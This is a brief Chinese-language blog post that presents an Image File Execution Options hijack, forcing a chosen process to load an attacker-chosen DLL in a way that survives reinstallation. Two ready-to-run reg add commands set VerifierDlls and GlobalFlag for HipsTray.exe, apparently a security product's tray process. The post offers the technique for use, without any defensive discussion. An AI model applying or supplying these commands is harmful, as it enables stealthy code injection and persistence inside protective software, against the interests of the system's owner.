道可道，非常道, 名可名，非常名!

Powerful inject

发表于 2021-01-07 | 分类于 Windows

Powerful inject

镜像劫持，指定进程加载指定dll

重装程序劫持依旧生效。

1
2

reg add "hklm\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsTray.exe"  /v VerifierDlls /t REG_SZ /d test.dll
reg add "hklm\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsTray.exe"  /v GlobalFlag /t REG_DWORD /d 256

本文作者： scareing
本文链接： https://github.com/scareing/scareing.github.io/2021/01/07/Powerful inject/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！